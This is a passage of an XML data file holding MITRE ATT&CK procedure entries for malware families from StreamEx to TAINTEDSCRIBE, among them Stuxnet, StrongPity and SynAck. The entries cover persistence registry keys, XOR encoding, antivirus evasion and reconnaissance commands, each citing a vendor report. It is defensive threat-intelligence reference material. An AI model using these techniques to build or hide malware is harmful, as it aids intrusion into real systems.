    <t>[StreamEx](https://attack.mitre.org/software/S0142) obfuscates some commands by using statically programmed fragments of strings when starting a DLL. It also uses a one-byte xor against 0x91 to encode configuration data.(Citation: Cylance Shell Crew Feb 2017)</t>
  </si>
  <si>
    <t>[StreamEx](https://attack.mitre.org/software/S0142) has the ability to enumerate processes.(Citation: Cylance Shell Crew Feb 2017)</t>
  </si>
  <si>
    <t>[StreamEx](https://attack.mitre.org/software/S0142) uses rundll32 to call an exported function.(Citation: Cylance Shell Crew Feb 2017)</t>
  </si>
  <si>
    <t>[StreamEx](https://attack.mitre.org/software/S0142) has the ability to scan for security tools such as firewalls and antivirus tools.(Citation: Cylance Shell Crew Feb 2017)</t>
  </si>
  <si>
    <t>[StreamEx](https://attack.mitre.org/software/S0142) has the ability to enumerate system information.(Citation: Cylance Shell Crew Feb 2017)</t>
  </si>
  <si>
    <t>[StreamEx](https://attack.mitre.org/software/S0142) has the ability to remotely execute commands.(Citation: Cylance Shell Crew Feb 2017)</t>
  </si>
  <si>
    <t>[StreamEx](https://attack.mitre.org/software/S0142) establishes persistence by installing a new service pointing to its DLL and setting the service to auto-start.(Citation: Cylance Shell Crew Feb 2017)</t>
  </si>
  <si>
    <t>[StrifeWater](https://attack.mitre.org/software/S1034) can collect data from a compromised host.(Citation: Cybereason StrifeWater Feb 2022)</t>
  </si>
  <si>
    <t>[StrifeWater](https://attack.mitre.org/software/S1034) can send data and files from a compromised host to its C2 server.(Citation: Cybereason StrifeWater Feb 2022)</t>
  </si>
  <si>
    <t>[StrifeWater](https://attack.mitre.org/software/S1034) can self delete to cover its tracks.(Citation: Cybereason StrifeWater Feb 2022)</t>
  </si>
  <si>
    <t>[StrifeWater](https://attack.mitre.org/software/S1034) can enumerate files on a compromised host.(Citation: Cybereason StrifeWater Feb 2022)</t>
  </si>
  <si>
    <t>[StrifeWater](https://attack.mitre.org/software/S1034) can download updates and auxiliary modules.(Citation: Cybereason StrifeWater Feb 2022)</t>
  </si>
  <si>
    <t>[StrifeWater](https://attack.mitre.org/software/S1034) has been named `calc.exe` to appear as a legitimate calculator program.(Citation: Cybereason StrifeWater Feb 2022)</t>
  </si>
  <si>
    <t>[StrifeWater](https://attack.mitre.org/software/S1034) can use a variety of APIs for execution.(Citation: Cybereason StrifeWater Feb 2022)</t>
  </si>
  <si>
    <t>[StrifeWater](https://attack.mitre.org/software/S1034) has create a scheduled task named `Mozilla\Firefox Default Browser Agent 409046Z0FF4A39CB` for persistence.(Citation: Cybereason StrifeWater Feb 2022)</t>
  </si>
  <si>
    <t>[StrifeWater](https://attack.mitre.org/software/S1034) has the ability to take screen captures.(Citation: Cybereason StrifeWater Feb 2022)</t>
  </si>
  <si>
    <t>[StrifeWater](https://attack.mitre.org/software/S1034) can encrypt C2 traffic using XOR with a hard coded key.(Citation: Cybereason StrifeWater Feb 2022)</t>
  </si>
  <si>
    <t>[StrifeWater](https://attack.mitre.org/software/S1034) can collect the OS version, architecture, and machine name to create a unique token for the infected host.(Citation: Cybereason StrifeWater Feb 2022)</t>
  </si>
  <si>
    <t>[StrifeWater](https://attack.mitre.org/software/S1034) can collect the user name from the victim's machine.(Citation: Cybereason StrifeWater Feb 2022)</t>
  </si>
  <si>
    <t>[StrifeWater](https://attack.mitre.org/software/S1034) can collect the time zone from the victim's machine.(Citation: Cybereason StrifeWater Feb 2022)</t>
  </si>
  <si>
    <t>[StrifeWater](https://attack.mitre.org/software/S1034) can modify its sleep time responses from the default of 20-22 seconds.(Citation: Cybereason StrifeWater Feb 2022)</t>
  </si>
  <si>
    <t>[StrifeWater](https://attack.mitre.org/software/S1034) can execute shell commands using `cmd.exe`.(Citation: Cybereason StrifeWater Feb 2022)</t>
  </si>
  <si>
    <t>[StrongPity](https://attack.mitre.org/software/S0491) can compress and encrypt archived files into multiple .sft files with a repeated xor encryption scheme.(Citation: Talos Promethium June 2020)(Citation: Bitdefender StrongPity June 2020)</t>
  </si>
  <si>
    <t>[StrongPity](https://attack.mitre.org/software/S0491) has encrypted C2 traffic using SSL/TLS.(Citation: Talos Promethium June 2020)</t>
  </si>
  <si>
    <t>[StrongPity](https://attack.mitre.org/software/S0491) has a file searcher component that can automatically collect and archive files based on a predefined list of file extensions.(Citation: Bitdefender StrongPity June 2020)</t>
  </si>
  <si>
    <t>[StrongPity](https://attack.mitre.org/software/S0491) can automatically exfiltrate collected documents to the C2 server.(Citation: Talos Promethium June 2020)(Citation: Bitdefender StrongPity June 2020)</t>
  </si>
  <si>
    <t>[StrongPity](https://attack.mitre.org/software/S0491) has been signed with self-signed certificates.(Citation: Bitdefender StrongPity June 2020)</t>
  </si>
  <si>
    <t>[StrongPity](https://attack.mitre.org/software/S0491) can add directories used by the malware to the Windows Defender exclusions list to prevent detection.(Citation: Talos Promethium June 2020)</t>
  </si>
  <si>
    <t>[StrongPity](https://attack.mitre.org/software/S0491) can exfiltrate collected documents through C2 channels.(Citation: Talos Promethium June 2020)(Citation: Bitdefender StrongPity June 2020)</t>
  </si>
  <si>
    <t>[StrongPity](https://attack.mitre.org/software/S0491) can delete previously exfiltrated files from the compromised host.(Citation: Talos Promethium June 2020)(Citation: Bitdefender StrongPity June 2020)</t>
  </si>
  <si>
    <t>[StrongPity](https://attack.mitre.org/software/S0491) can parse the hard drive on a compromised host to identify specific file extensions.(Citation: Talos Promethium June 2020)</t>
  </si>
  <si>
    <t>[StrongPity](https://attack.mitre.org/software/S0491) has the ability to hide the console window for its document search module from the user.(Citation: Talos Promethium June 2020)</t>
  </si>
  <si>
    <t>[StrongPity](https://attack.mitre.org/software/S0491) can download files to specified targets.(Citation: Bitdefender StrongPity June 2020)</t>
  </si>
  <si>
    <t>[StrongPity](https://attack.mitre.org/software/S0491) has been executed via compromised installation files for legitimate software including compression applications, security software, browsers, file recovery applications, and other tools and utilities.(Citation: Talos Promethium June 2020)(Citation: Bitdefender StrongPity June 2020)</t>
  </si>
  <si>
    <t>[StrongPity](https://attack.mitre.org/software/S0491) has named services to appear legitimate.(Citation: Talos Promethium June 2020)(Citation: Bitdefender StrongPity June 2020)</t>
  </si>
  <si>
    <t>[StrongPity](https://attack.mitre.org/software/S0491) has been bundled with legitimate software installation files for disguise.(Citation: Talos Promethium June 2020)</t>
  </si>
  <si>
    <t>[StrongPity](https://attack.mitre.org/software/S0491) can use multiple layers of proxy servers to hide terminal nodes in its infrastructure.(Citation: Bitdefender StrongPity June 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">
[StrongPity](https://attack.mitre.org/software/S0491) has used HTTPS over port 1402 in C2 communication.(Citation: Bitdefender StrongPity June 2020)</t>
  </si>
  <si>
    <t>[StrongPity](https://attack.mitre.org/software/S0491) has used encrypted strings in its dropper component.(Citation: Talos Promethium June 2020)(Citation: Bitdefender StrongPity June 2020)</t>
  </si>
  <si>
    <t>[StrongPity](https://attack.mitre.org/software/S0491) can use PowerShell to add files to the Windows Defender exclusions list.(Citation: Talos Promethium June 2020)</t>
  </si>
  <si>
    <t>[StrongPity](https://attack.mitre.org/software/S0491) can determine if a user is logged in by checking to see if explorer.exe is running.(Citation: Talos Promethium June 2020)</t>
  </si>
  <si>
    <t>[StrongPity](https://attack.mitre.org/software/S0491) can use the &lt;code&gt;HKCU\Software\Microsoft\Windows\CurrentVersion\Run&lt;/code&gt; Registry key for persistence.(Citation: Talos Promethium June 2020)</t>
  </si>
  <si>
    <t>[StrongPity](https://attack.mitre.org/software/S0491) can identify if ESET or BitDefender antivirus are installed before dropping its payload.(Citation: Talos Promethium June 2020)</t>
  </si>
  <si>
    <t>[StrongPity](https://attack.mitre.org/software/S0491) can install a service to execute itself as a service.(Citation: Talos Promethium June 2020)(Citation: Bitdefender StrongPity June 2020)</t>
  </si>
  <si>
    <t>[StrongPity](https://attack.mitre.org/software/S0491) can identify the hard disk volume serial number on a compromised host.(Citation: Talos Promethium June 2020)</t>
  </si>
  <si>
    <t>[StrongPity](https://attack.mitre.org/software/S0491) can identify the IP address of a compromised host.(Citation: Talos Promethium June 2020)</t>
  </si>
  <si>
    <t>[StrongPity](https://attack.mitre.org/software/S0491) can use HTTP and HTTPS in C2 communications.(Citation: Talos Promethium June 2020)(Citation: Bitdefender StrongPity June 2020)</t>
  </si>
  <si>
    <t>[StrongPity](https://attack.mitre.org/software/S0491) has created new services and modified existing services for persistence.(Citation: Talos Promethium June 2020)</t>
  </si>
  <si>
    <t>[Stuxnet](https://attack.mitre.org/software/S0603) encrypts exfiltrated data via C2 with static 31-byte long XOR keys.(Citation: Symantec W.32 Stuxnet Dossier)</t>
  </si>
  <si>
    <t>[Stuxnet](https://attack.mitre.org/software/S0603) used a digitally signed driver with a compromised Realtek certificate.(Citation: Symantec W.32 Stuxnet Dossier)</t>
  </si>
  <si>
    <t>[Stuxnet](https://attack.mitre.org/software/S0603) infected WinCC machines via a hardcoded database server password.(Citation: Symantec W.32 Stuxnet Dossier)</t>
  </si>
  <si>
    <t>[Stuxnet](https://attack.mitre.org/software/S0603) decrypts resources that are loaded into memory and executed.(Citation: Symantec W.32 Stuxnet Dossier)</t>
  </si>
  <si>
    <t>[Stuxnet](https://attack.mitre.org/software/S0603) enumerates user accounts of the domain.(Citation: Symantec W.32 Stuxnet Dossier)</t>
  </si>
  <si>
    <t>[Stuxnet](https://attack.mitre.org/software/S0603) attempts to access network resources with a domain account’s credentials.(Citation: Symantec W.32 Stuxnet Dossier)</t>
  </si>
  <si>
    <t>[Stuxnet](https://attack.mitre.org/software/S0603) injects an entire DLL into an existing, newly created, or preselected trusted process.(Citation: Symantec W.32 Stuxnet Dossier)</t>
  </si>
  <si>
    <t xml:space="preserve">[Stuxnet](https://attack.mitre.org/software/S0603) checks for specific operating systems on 32-bit machines, Registry keys, and dates for vulnerabilities, and will exit execution if the values are not met.(Citation: Symantec W.32 Stuxnet Dossier) </t>
  </si>
  <si>
    <t>[Stuxnet](https://attack.mitre.org/software/S0603) sends compromised victim information via HTTP.(Citation: Symantec W.32 Stuxnet Dossier)</t>
  </si>
  <si>
    <t>[Stuxnet](https://attack.mitre.org/software/S0603) used MS10-073 and an undisclosed Task Scheduler vulnerability to escalate privileges on local Windows machines.(Citation: Symantec W.32 Stuxnet Dossier)</t>
  </si>
  <si>
    <t>[Stuxnet](https://attack.mitre.org/software/S0603) propagates using the MS10-061 Print Spooler and MS08-067 Windows Server Service vulnerabilities.(Citation: Symantec W.32 Stuxnet Dossier)</t>
  </si>
  <si>
    <t>[Stuxnet](https://attack.mitre.org/software/S0603) has the ability to generate new C2 domains.(Citation: Symantec W.32 Stuxnet Dossier)</t>
  </si>
  <si>
    <t>[Stuxnet](https://attack.mitre.org/software/S0603) uses an RPC server that contains a routine for file deletion and also removes itself from the system through a DLL export by deleting specific files.(Citation: Symantec W.32 Stuxnet Dossier)</t>
  </si>
  <si>
    <t>[Stuxnet](https://attack.mitre.org/software/S0603) uses a driver to scan for specific filesystem driver objects.(Citation: Symantec W.32 Stuxnet Dossier)</t>
  </si>
  <si>
    <t>[Stuxnet](https://attack.mitre.org/software/S0603) reduces the integrity level of objects to allow write actions.(Citation: Symantec W.32 Stuxnet Dossier)</t>
  </si>
  <si>
    <t>[Stuxnet](https://attack.mitre.org/software/S0603) can delete OLE Automation and SQL stored procedures used to store malicious payloads.(Citation: Symantec W.32 Stuxnet Dossier)</t>
  </si>
  <si>
    <t>[Stuxnet](https://attack.mitre.org/software/S0603) installs an RPC server for P2P communications.(Citation: Symantec W.32 Stuxnet Dossier)</t>
  </si>
  <si>
    <t>[Stuxnet](https://attack.mitre.org/software/S0603) uses an RPC server that contains a file dropping routine and support for payload version updates for P2P communications within a victim network.(Citation: Symantec W.32 Stuxnet Dossier)</t>
  </si>
  <si>
    <t>[Stuxnet](https://attack.mitre.org/software/S0603) enumerates user accounts of the local host.(Citation: Symantec W.32 Stuxnet Dossier)</t>
  </si>
  <si>
    <t>[Stuxnet](https://attack.mitre.org/software/S0603) can create registry keys to load driver files.(Citation: Symantec W.32 Stuxnet Dossier)</t>
  </si>
  <si>
    <t>[Stuxnet](https://attack.mitre.org/software/S0603) uses the SetSecurityDescriptorDacl API to reduce object integrity levels.(Citation: Symantec W.32 Stuxnet Dossier)</t>
  </si>
  <si>
    <t>[Stuxnet](https://attack.mitre.org/software/S0603) enumerates the directories of a network resource.(Citation: Symantec W.32 Stuxnet Dossier)</t>
  </si>
  <si>
    <t>[Stuxnet](https://attack.mitre.org/software/S0603) uses encrypted configuration blocks and writes encrypted files to disk.(Citation: Symantec W.32 Stuxnet Dossier)</t>
  </si>
  <si>
    <t>[Stuxnet](https://attack.mitre.org/software/S0603) enumerates removable drives for infection.(Citation: Symantec W.32 Stuxnet Dossier)</t>
  </si>
  <si>
    <t>[Stuxnet](https://attack.mitre.org/software/S0603) searches the Registry for indicators of security programs.(Citation: Symantec W.32 Stuxnet Dossier)</t>
  </si>
  <si>
    <t>[Stuxnet](https://attack.mitre.org/software/S0603) can propagate via peer-to-peer communication and updates using RPC.(Citation: Symantec W.32 Stuxnet Dossier)</t>
  </si>
  <si>
    <t>[Stuxnet](https://attack.mitre.org/software/S0603) can propagate via removable media using an autorun.inf file or the CVE-2010-2568 LNK vulnerability.(Citation: Symantec W.32 Stuxnet Dossier)</t>
  </si>
  <si>
    <t>[Stuxnet](https://attack.mitre.org/software/S0603) uses a Windows rootkit to mask its binaries and other relevant files.(Citation: Symantec W.32 Stuxnet Dossier)</t>
  </si>
  <si>
    <t>[Stuxnet](https://attack.mitre.org/software/S0603) propagates to available network shares.(Citation: Symantec W.32 Stuxnet Dossier)</t>
  </si>
  <si>
    <t>[Stuxnet](https://attack.mitre.org/software/S0603) used xp_cmdshell to store and execute SQL code.(Citation: Symantec W.32 Stuxnet Dossier)</t>
  </si>
  <si>
    <t>[Stuxnet](https://attack.mitre.org/software/S0603) schedules a network job to execute two minutes after host infection.(Citation: Symantec W.32 Stuxnet Dossier)</t>
  </si>
  <si>
    <t>[Stuxnet](https://attack.mitre.org/software/S0603) enumerates the currently running processes related to a variety of security products.(Citation: Symantec W.32 Stuxnet Dossier)</t>
  </si>
  <si>
    <t>[Stuxnet](https://attack.mitre.org/software/S0603) calls LoadLibrary then executes exports from a DLL.(Citation: Symantec W.32 Stuxnet Dossier)</t>
  </si>
  <si>
    <t>[Stuxnet](https://attack.mitre.org/software/S0603) transforms encrypted binary data into an ASCII string in order to use it as a URL parameter value.(Citation: Symantec W.32 Stuxnet Dossier)</t>
  </si>
  <si>
    <t xml:space="preserve">[Stuxnet](https://attack.mitre.org/software/S0603) encodes the payload of system information sent to the command and control servers using a one byte 0xFF XOR key. [Stuxnet](https://attack.mitre.org/software/S0603) also uses a 31-byte long static byte string to XOR data sent to command and control servers. The servers use a different static key to encrypt replies to the implant.(Citation: Symantec W.32 Stuxnet Dossier) </t>
  </si>
  <si>
    <t>[Stuxnet](https://attack.mitre.org/software/S0603) collects system information including computer and domain names, OS version, and S7P paths.(Citation: Symantec W.32 Stuxnet Dossier)</t>
  </si>
  <si>
    <t>[Stuxnet](https://attack.mitre.org/software/S0603) collects the IP address of a compromised system.(Citation: Symantec W.32 Stuxnet Dossier)</t>
  </si>
  <si>
    <t>[Stuxnet](https://attack.mitre.org/software/S0603) collects the time and date of a system when it is infected.(Citation: Symantec W.32 Stuxnet Dossier)</t>
  </si>
  <si>
    <t>[Stuxnet](https://attack.mitre.org/software/S0603) infects remote servers via network shares and by infecting WinCC database views with malicious code.(Citation: Symantec W.32 Stuxnet Dossier)</t>
  </si>
  <si>
    <t>[Stuxnet](https://attack.mitre.org/software/S0603) extracts and writes driver files that match the times of other legitimate files.(Citation: Symantec W.32 Stuxnet Dossier)</t>
  </si>
  <si>
    <t>[Stuxnet](https://attack.mitre.org/software/S0603) attempts to impersonate an anonymous token to enumerate bindings in the service control manager.(Citation: Symantec W.32 Stuxnet Dossier)</t>
  </si>
  <si>
    <t>[Stuxnet](https://attack.mitre.org/software/S0603) uses HTTP to communicate with a command and control server. (Citation: Symantec W.32 Stuxnet Dossier)</t>
  </si>
  <si>
    <t>[Stuxnet](https://attack.mitre.org/software/S0603) used WMI with an &lt;code&gt;explorer.exe&lt;/code&gt; token to execute on a remote share.(Citation: Symantec W.32 Stuxnet Dossier)</t>
  </si>
  <si>
    <t>[Stuxnet](https://attack.mitre.org/software/S0603) uses a driver registered as a boot start service as the main load-point.(Citation: Symantec W.32 Stuxnet Dossier)</t>
  </si>
  <si>
    <t>[Sykipot](https://attack.mitre.org/software/S0018) uses SSL for encrypting C2 communications.(Citation: Blasco 2013)</t>
  </si>
  <si>
    <t>[Sykipot](https://attack.mitre.org/software/S0018) may use &lt;code&gt;net group "domain admins" /domain&lt;/code&gt; to display accounts in the "domain admins" permissions group and &lt;code&gt;net localgroup "administrators"&lt;/code&gt; to list local system administrator group membership.(Citation: AlienVault Sykipot 2011)</t>
  </si>
  <si>
    <t>[Sykipot](https://attack.mitre.org/software/S0018) injects itself into running instances of outlook.exe, iexplore.exe, or firefox.exe.(Citation: AlienVault Sykipot 2011)</t>
  </si>
  <si>
    <t>[Sykipot](https://attack.mitre.org/software/S0018) contains keylogging functionality to steal passwords.(Citation: Alienvault Sykipot DOD Smart Cards)</t>
  </si>
  <si>
    <t>[Sykipot](https://attack.mitre.org/software/S0018) is known to contain functionality that enables targeting of smart card technologies to proxy authentication for connections to restricted network resources using detected hardware tokens.(Citation: Alienvault Sykipot DOD Smart Cards)</t>
  </si>
  <si>
    <t>[Sykipot](https://attack.mitre.org/software/S0018) may gather a list of running processes by running &lt;code&gt;tasklist /v&lt;/code&gt;.(Citation: AlienVault Sykipot 2011)</t>
  </si>
  <si>
    <t>[Sykipot](https://attack.mitre.org/software/S0018) has been known to establish persistence by adding programs to the Run Registry key.(Citation: Blasco 2013)</t>
  </si>
  <si>
    <t>[Sykipot](https://attack.mitre.org/software/S0018) may use &lt;code&gt;net view /domain&lt;/code&gt; to display hostnames of available systems on a network.(Citation: AlienVault Sykipot 2011)</t>
  </si>
  <si>
    <t>[Sykipot](https://attack.mitre.org/software/S0018) may use &lt;code&gt;ipconfig /all&lt;/code&gt; to gather system network configuration details.(Citation: AlienVault Sykipot 2011)</t>
  </si>
  <si>
    <t>[Sykipot](https://attack.mitre.org/software/S0018) may use &lt;code&gt;netstat -ano&lt;/code&gt; to display active network connections.(Citation: AlienVault Sykipot 2011)</t>
  </si>
  <si>
    <t>[Sykipot](https://attack.mitre.org/software/S0018) may use &lt;code&gt;net start&lt;/code&gt; to display running services.(Citation: AlienVault Sykipot 2011)</t>
  </si>
  <si>
    <t>[SynAck](https://attack.mitre.org/software/S0242) clears event logs.(Citation: SecureList SynAck Doppelgänging May 2018)</t>
  </si>
  <si>
    <t>[SynAck](https://attack.mitre.org/software/S0242) encrypts the victims machine followed by asking the victim to pay a ransom. (Citation: SecureList SynAck Doppelgänging May 2018)</t>
  </si>
  <si>
    <t>[SynAck](https://attack.mitre.org/software/S0242) checks its directory location in an attempt to avoid launching in a sandbox.(Citation: SecureList SynAck Doppelgänging May 2018)(Citation: Kaspersky Lab SynAck May 2018)</t>
  </si>
  <si>
    <t>[SynAck](https://attack.mitre.org/software/S0242) can manipulate Registry keys.(Citation: SecureList SynAck Doppelgänging May 2018)</t>
  </si>
  <si>
    <t>[SynAck](https://attack.mitre.org/software/S0242) parses the export tables of system DLLs to locate and call various Windows API functions.(Citation: SecureList SynAck Doppelgänging May 2018)(Citation: Kaspersky Lab SynAck May 2018)</t>
  </si>
  <si>
    <t>[SynAck](https://attack.mitre.org/software/S0242) payloads are obfuscated prior to compilation to inhibit analysis and/or reverse engineering.(Citation: SecureList SynAck Doppelgänging May 2018)(Citation: Kaspersky Lab SynAck May 2018)</t>
  </si>
  <si>
    <t>[SynAck](https://attack.mitre.org/software/S0242) enumerates all running processes.(Citation: SecureList SynAck Doppelgänging May 2018)(Citation: Kaspersky Lab SynAck May 2018)</t>
  </si>
  <si>
    <t>[SynAck](https://attack.mitre.org/software/S0242) abuses NTFS transactions to launch and conceal malicious processes.(Citation: SecureList SynAck Doppelgänging May 2018)(Citation: Kaspersky Lab SynAck May 2018)</t>
  </si>
  <si>
    <t>[SynAck](https://attack.mitre.org/software/S0242) enumerates Registry keys associated with event logs.(Citation: SecureList SynAck Doppelgänging May 2018)</t>
  </si>
  <si>
    <t>[SynAck](https://attack.mitre.org/software/S0242) gathers computer names, OS version info, and also checks installed keyboard layouts to estimate if it has been launched from a certain list of countries.(Citation: SecureList SynAck Doppelgänging May 2018)</t>
  </si>
  <si>
    <t xml:space="preserve">[SynAck](https://attack.mitre.org/software/S0242) lists all the keyboard layouts installed on the victim’s system using &lt;code&gt;GetKeyboardLayoutList&lt;/code&gt; API and checks against a hardcoded language code list. If a match if found, SynAck sleeps for 300 seconds and then exits without encrypting files.(Citation: SecureList SynAck Doppelgänging May 2018) </t>
  </si>
  <si>
    <t>[SynAck](https://attack.mitre.org/software/S0242) gathers user names from infected hosts.(Citation: SecureList SynAck Doppelgänging May 2018)</t>
  </si>
  <si>
    <t>[SynAck](https://attack.mitre.org/software/S0242) enumerates all running services.(Citation: SecureList SynAck Doppelgänging May 2018)(Citation: Kaspersky Lab SynAck May 2018)</t>
  </si>
  <si>
    <t>[Sys10](https://attack.mitre.org/software/S0060) collects the group name of the logged-in user and sends it to the C2.(Citation: Baumgartner Naikon 2015)</t>
  </si>
  <si>
    <t>[Sys10](https://attack.mitre.org/software/S0060) uses an XOR 0x1 loop to encrypt its C2 domain.(Citation: Baumgartner Naikon 2015)</t>
  </si>
  <si>
    <t>[Sys10](https://attack.mitre.org/software/S0060) collects the computer name, OS versioning information, and OS install date and sends the information to the C2.(Citation: Baumgartner Naikon 2015)</t>
  </si>
  <si>
    <t>[Sys10](https://attack.mitre.org/software/S0060) collects the local IP address of the victim and sends it to the C2.(Citation: Baumgartner Naikon 2015)</t>
  </si>
  <si>
    <t>[Sys10](https://attack.mitre.org/software/S0060) collects the account name of the logged-in user and sends it to the C2.(Citation: Baumgartner Naikon 2015)</t>
  </si>
  <si>
    <t>[Sys10](https://attack.mitre.org/software/S0060) uses HTTP for C2.(Citation: Baumgartner Naikon 2015)</t>
  </si>
  <si>
    <t xml:space="preserve">[SysUpdate](https://attack.mitre.org/software/S0663) can load DLLs through vulnerable legitimate executables.(Citation: Trend Micro Iron Tiger April 2021)
</t>
  </si>
  <si>
    <t>[SysUpdate](https://attack.mitre.org/software/S0663) can deobfuscate packed binaries in memory.(Citation: Trend Micro Iron Tiger April 2021)</t>
  </si>
  <si>
    <t>[SysUpdate](https://attack.mitre.org/software/S0663) can delete its configuration file from the targeted system.(Citation: Trend Micro Iron Tiger April 2021)</t>
  </si>
  <si>
    <t>[SysUpdate](https://attack.mitre.org/software/S0663) can search files on a compromised host.(Citation: Trend Micro Iron Tiger April 2021)</t>
  </si>
  <si>
    <t>[SysUpdate](https://attack.mitre.org/software/S0663) has the ability to set file attributes to hidden.(Citation: Trend Micro Iron Tiger April 2021)</t>
  </si>
  <si>
    <t>[SysUpdate](https://attack.mitre.org/software/S0663) has the ability to download files to a compromised host.(Citation: Trend Micro Iron Tiger April 2021)</t>
  </si>
  <si>
    <t>[SysUpdate](https://attack.mitre.org/software/S0663) can write its configuration file to &lt;code&gt;Software\Classes\scConfig&lt;/code&gt; in either &lt;code&gt;HKEY_LOCAL_MACHINE&lt;/code&gt; or &lt;code&gt;HKEY_CURRENT_USER&lt;/code&gt;.(Citation: Trend Micro Iron Tiger April 2021)</t>
  </si>
  <si>
    <t>[SysUpdate](https://attack.mitre.org/software/S0663) can encrypt and encode its configuration file.(Citation: Trend Micro Iron Tiger April 2021)</t>
  </si>
  <si>
    <t>[SysUpdate](https://attack.mitre.org/software/S0663) can use a Registry Run key to establish persistence.(Citation: Trend Micro Iron Tiger April 2021)</t>
  </si>
  <si>
    <t>[SysUpdate](https://attack.mitre.org/software/S0663) has the ability to capture screenshots.(Citation: Trend Micro Iron Tiger April 2021)</t>
  </si>
  <si>
    <t>[SysUpdate](https://attack.mitre.org/software/S0663) can manage services and processes.(Citation: Trend Micro Iron Tiger April 2021)</t>
  </si>
  <si>
    <t>[SysUpdate](https://attack.mitre.org/software/S0663) can use packed binaries.(Citation: Trend Micro Iron Tiger April 2021)</t>
  </si>
  <si>
    <t>[SysUpdate](https://attack.mitre.org/software/S0663) can determine whether a system has a 32 bit or 64 bit architecture.(Citation: Trend Micro Iron Tiger April 2021)</t>
  </si>
  <si>
    <t>[SysUpdate](https://attack.mitre.org/software/S0663) can use WMI for execution on a compromised host.(Citation: Trend Micro Iron Tiger April 2021)</t>
  </si>
  <si>
    <t>[SysUpdate](https://attack.mitre.org/software/S0663) can create a service to establish persistence.(Citation: Trend Micro Iron Tiger April 2021)</t>
  </si>
  <si>
    <t>[Systeminfo](https://attack.mitre.org/software/S0096) can be used to gather information about the operating system.(Citation: TechNet Systeminfo)</t>
  </si>
  <si>
    <t>If a victim meets certain criteria, [T9000](https://attack.mitre.org/software/S0098) uses the AppInit_DLL functionality to achieve persistence by ensuring that every user mode process that is spawned will load its malicious DLL, ResN32.dll. It does this by creating the following Registry keys: &lt;code&gt;HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs – %APPDATA%\Intel\ResN32.dll&lt;/code&gt; and &lt;code&gt;HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows\LoadAppInit_DLLs – 0x1&lt;/code&gt;.(Citation: Palo Alto T9000 Feb 2016)</t>
  </si>
  <si>
    <t>[T9000](https://attack.mitre.org/software/S0098) encrypts collected data using a single byte XOR key.(Citation: Palo Alto T9000 Feb 2016)</t>
  </si>
  <si>
    <t>[T9000](https://attack.mitre.org/software/S0098) uses the Skype API to record audio and video calls. It writes encrypted data to &lt;code&gt;%APPDATA%\Intel\Skype&lt;/code&gt;.(Citation: Palo Alto T9000 Feb 2016)</t>
  </si>
  <si>
    <t>[T9000](https://attack.mitre.org/software/S0098) searches removable storage devices for files with a pre-defined list of file extensions (e.g. * .doc, *.ppt, *.xls, *.docx, *.pptx, *.xlsx). Any matching files are encrypted and written to a local user directory.(Citation: Palo Alto T9000 Feb 2016)</t>
  </si>
  <si>
    <t>During the [T9000](https://attack.mitre.org/software/S0098) installation process, it drops a copy of the legitimate Microsoft binary igfxtray.exe. The executable contains a side-loading weakness which is used to load a portion of the malware.(Citation: Palo Alto T9000 Feb 2016)</t>
  </si>
  <si>
    <t>[T9000](https://attack.mitre.org/software/S0098) searches through connected drives for removable storage devices.(Citation: Palo Alto T9000 Feb 2016)</t>
  </si>
  <si>
    <t>[T9000](https://attack.mitre.org/software/S0098) can take screenshots of the desktop and target application windows, saving them to user directories as one byte XOR encrypted .dat files.(Citation: Palo Alto T9000 Feb 2016)</t>
  </si>
  <si>
    <t>[T9000](https://attack.mitre.org/software/S0098) performs checks for various antivirus and security products during installation.(Citation: Palo Alto T9000 Feb 2016)</t>
  </si>
  <si>
    <t>[T9000](https://attack.mitre.org/software/S0098) gathers and beacons the operating system build number and CPU Architecture (32-bit/64-bit) during installation.(Citation: Palo Alto T9000 Feb 2016)</t>
  </si>
  <si>
    <t>[T9000](https://attack.mitre.org/software/S0098) gathers and beacons the MAC and IP addresses during installation.(Citation: Palo Alto T9000 Feb 2016)</t>
  </si>
  <si>
    <t>[T9000](https://attack.mitre.org/software/S0098) gathers and beacons the username of the logged in account during installation. It will also gather the username of running processes to determine if it is running as SYSTEM.(Citation: Palo Alto T9000 Feb 2016)</t>
  </si>
  <si>
    <t>[T9000](https://attack.mitre.org/software/S0098) gathers and beacons the system time during installation.(Citation: Palo Alto T9000 Feb 2016)</t>
  </si>
  <si>
    <t>[TAINTEDSCRIBE](https://attack.mitre.org/software/S0586) has used &lt;code&gt;FileReadZipSend&lt;/code&gt; to compress a file and send to C2.(Citation: CISA MAR-10288834-2.v1  TAINTEDSCRIBE MAY 2020)</t>
  </si>
  <si>
    <t>[TAINTEDSCRIBE](https://attack.mitre.org/software/S0586) can execute &lt;code&gt;FileRecvWriteRand&lt;/code&gt; to append random bytes to the end of a file received from C2.(Citation: CISA MAR-10288834-2.v1  TAINTEDSCRIBE MAY 2020)</t>
  </si>
  <si>
    <t>[TAINTEDSCRIBE](https://attack.mitre.org/software/S0586) can randomly pick one of five hard-coded IP addresses for C2 communication; if one of the IP fails, it will wait 60 seconds and then try another IP address.(Citation: CISA MAR-10288834-2.v1  TAINTEDSCRIBE MAY 2020)</t>
  </si>
  <si>
    <t>[TAINTEDSCRIBE](https://attack.mitre.org/software/S0586) can delete files from a compromised host.(Citation: CISA MAR-10288834-2.v1  TAINTEDSCRIBE MAY 2020)</t>
  </si>
  <si>
    <t>[TAINTEDSCRIBE](https://attack.mitre.org/software/S0586) can use &lt;code&gt;DirectoryList&lt;/code&gt; to enumerate files in a specified directory.(Citation: CISA MAR-10288834-2.v1  TAINTEDSCRIBE MAY 2020)</t>
  </si>
  <si>
    <t>[TAINTEDSCRIBE](https://attack.mitre.org/software/S0586) can download additional modules from its C2 server.(Citation: CISA MAR-10288834-2.v1  TAINTEDSCRIBE MAY 2020)</t>
  </si>
  <si>
    <t>The [TAINTEDSCRIBE](https://attack.mitre.org/software/S0586) main executable has disguised itself as Microsoft’s Narrator.(Citation: CISA MAR-10288834-2.v1  TAINTEDSCRIBE MAY 2020)</t>
  </si>
  <si>
    <t>[TAINTEDSCRIBE](https://attack.mitre.org/software/S0586) can execute &lt;code&gt;ProcessList&lt;/code&gt; for process discovery.(Citation: CISA MAR-10288834-2.v1  TAINTEDSCRIBE MAY 2020)</t>
  </si>
  <si>
